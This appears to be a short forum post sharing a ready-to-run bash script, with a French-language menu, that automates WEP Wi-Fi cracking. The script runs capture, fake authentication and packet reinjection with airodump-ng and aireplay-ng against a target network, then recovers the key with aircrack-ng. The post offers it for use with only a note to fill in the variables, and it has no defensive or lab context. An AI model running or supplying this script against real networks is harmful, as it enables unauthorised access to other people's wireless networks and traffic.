Script for WEP cracking:
Scan your LAN, fill out the variables starting with $, make it runnable and rename it in with the .sh extension before running it with parameters.
credit : koala
Scan your LAN, fill out the variables starting with $, make it runnable and rename it in with the .sh extension before running it with parameters.
Code:
#!/bin/bash intro="\n -----------------------------------\n ~~~~~~~ \033[01;34mFloWEP - Unbutu9.10 \033[0m ~~~~~~\n -----------------------------------\n" ok="[\033[01;32mOK\033[0m]" menu(){ clear echo -e $intro echo -e "\033[01;31mA vous de voir...:\033[0m" echo ">> 1 Attaque reeinjection normale" echo ">> 2 Attaque reeinjection forcee" echo ">> 3 Quitter" echo echo echo -n ">> Choix : " ; read choix case $choix in 1) clear echo -e $intro echo -e "\033[01;31m --== Crack WEP en cours... ==--\033[0m" echo xterm -hold -e airodump-ng -w $fichierdecapture -c $canal --bssid $bssid mon0 &> /dev/null & sleep 5 xterm -hold -e aireplay-ng -1 30 -e $essid -a $bssid -h $mamac mon0 &> /dev/null & sleep 5 xterm -hold -e aireplay-ng -3 -e $essid -a $bssid -h $mamac -x 600 mon0 &> /dev/null & sleep 2400 xterm -hold -e aircrack-ng $fichiercapture-01.cap &> /dev/null & echo -e $ok sleep 2 ;; 2) clear echo -e $intro echo -e "\033[01;31m --== Crack WEP en cours... ==--\033[0m" echo xterm -hold -e airodump-ng -w $fichierdecapture -c $canal --bssid $bssid mon0 &> /dev/null & sleep 5 xterm -hold -e aireplay-ng -1 30 -e $essid -a $bssid -h $mamac mon0 &> /dev/null & sleep 5 xterm -hold -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b $bssid -h $mamac mon0 &> /dev/null & sleep 2400 xterm -hold -e aircrack-ng -P 1 $fichierdecapture*.cap &> /dev/null & echo -e $ok sleep 3 ;; 3) clear exit ;; esac } while true;do menu done exit
Commentaire